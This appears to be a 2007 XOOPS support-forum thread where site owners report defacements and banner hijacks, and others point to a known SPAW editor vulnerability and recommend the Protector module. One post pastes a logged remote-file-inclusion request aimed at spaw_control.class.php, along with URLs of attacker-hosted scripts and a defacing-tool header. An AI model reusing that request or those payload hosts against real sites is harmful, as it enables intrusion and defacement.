1
preachur
Are Xoops sites under attack???
  • 2007/11/8 21:37

  • preachur

  • Just can't stay away

  • Posts: 525

  • Since: 2006/2/4 4


I just set up a test site with 2.2.5 a few days ago, and the banners system was attacked. The default banner (xoops_banner.gif) would come up but them would change to one of those "your computer may be infected" banners within a few seconds. To click it would infect a user's computer. I am also noticing many pop-ups on some XOOPS sites I haven't noticed before.

Anyone else seen any of these things? I am shutting down the test site. I think te whole thing might be corrupted now.
Magick can never be restrained, but when freely given is thrice regained!

2
McDonald
Re: Are Xoops sites under attack???
  • 2007/11/8 21:47

  • McDonald

  • Home away from home

  • Posts: 1072

  • Since: 2005/8/15


Just saw this post on GIJOE's website: Hackers Group - S4udi-S3cuirty-T3rror.

3
freeop
Re: Are Xoops sites under attack???
  • 2007/11/8 22:08

  • freeop

  • Just popping in

  • Posts: 25

  • Since: 2002/4/12


Could be unrelated but I just had three XOOPS sites destroyed today.

---------------------------------------------------
//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://location-investment.com/admin/backup/testewillie.txt?

Http Code: 200 Date: Nov 08 11:29:21 Http Version: HTTP/1.1 Size in Bytes: 3772
Referer: -
Agent: Mozilla/3.0 (compatible; Indy Library)

---------------------------------------------------

the spaw root sites are many.. Another file used is rox.txt. I'm just digging into it and thought to browse this site to see if anyone is having the same problem..

The following sites are being used for my attack :
http://location-investment.com/admin/backup/testewillie.txt?
http://location-investment.com/admin/backup/rox.txt?
http://www.freewebs.com/nemez1s/perl.txt
http://www.office.bg/sux.txt
http://ir4dex.kit.net/cmd/tool25.dat

DEFACING TOOLZ TOOL25.DAT
<!--
Defacing Tool 2.0 by r3v3ng4ns
revengans@gmail.com

So if you r using ( if what I am looking at makes sense ) The cjaycontent module, you might check out your files..

4
irmtfan
Re: Are Xoops sites under attack???
  • 2007/11/8 22:08

  • irmtfan

  • Module Developer

  • Posts: 3419

  • Since: 2003/12/7


huum more seems its your PC under attack.
could you provide some links according to "many pop-ups on some XOOPS sites"?

also 2.2.5 is a not-recommended version.
use 2.0.17.1

5
preachur
Re: Are Xoops sites under attack???
  • 2007/11/8 22:08

  • preachur

  • Just can't stay away

  • Posts: 525

  • Since: 2006/2/4 4


I am wondering if the latest version of protector is working well? I have it on both my main (2.0.17.1) sites. I don't need those two getting hacked.....
Magick can never be restrained, but when freely given is thrice regained!

6
irmtfan
Re: Are Xoops sites under attack???
  • 2007/11/8 22:12

  • irmtfan

  • Module Developer

  • Posts: 3419

  • Since: 2003/12/7


LOl 3 posts in the same time!
@ freeop:
about vulnerability in SPAW editor:
https://xoops.org/modules/news/article.php?storyid=3799

7
preachur
Re: Are Xoops sites under attack???
  • 2007/11/8 22:13

  • preachur

  • Just can't stay away

  • Posts: 525

  • Since: 2006/2/4 4


I hate to say it, but I am taking all searchable references to XOOPS off of my sites for awhile. I really don't want my work destroyed because I am running xoops.
Magick can never be restrained, but when freely given is thrice regained!

8
freeop
Re: Are Xoops sites under attack???
  • 2007/11/8 22:14

  • freeop

  • Just popping in

  • Posts: 25

  • Since: 2002/4/12


Looks like mine is a direct security issue using cjaycontent. just read a posted warning about it dated 2007.. Pays to keep up with security issues..darn.. will have to hopefully replace XOOPS files. I hope its not the Dbase too..

9
freeop
Re: Are Xoops sites under attack???
  • 2007/11/8 22:17

  • freeop

  • Just popping in

  • Posts: 25

  • Since: 2002/4/12


yeah thx. i search for cjay on the site but missed it.. I think my issue and preachur's are different, just bad timing. back to the ftp

10
Anonymous
Re: Are Xoops sites under attack???
  • 2007/11/8 22:19

  • Anonymous

  • Posts: 0

  • Since:


Quote:
freeop wrote:

//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://location-investment.com/admin/backup/testewillie.txt?


Quote:
freeop wrote:

So if you r using ( if what I am looking at makes sense ) The cjaycontent module, you might check out your files..


I suspect that the problem isn't cjaycontent.

The spaw WYSIWYG editor is, IIRC, the weak link and is known to be vulnerable.

Change to one of the other WYSIWYG editors - I use koivi but the others should be okay too.

If you're not using Protector 3.04 (or 3.15beta) then do so ASAP.

[edit:
irmtfan beat me to it! Follow the advice given in the links and get rid of the spaw class php file mentioned.]

Login

Who's Online

248 user(s) are online (146 user(s) are browsing Support Forums)


Members: 0


Guests: 248


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Mar 31
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits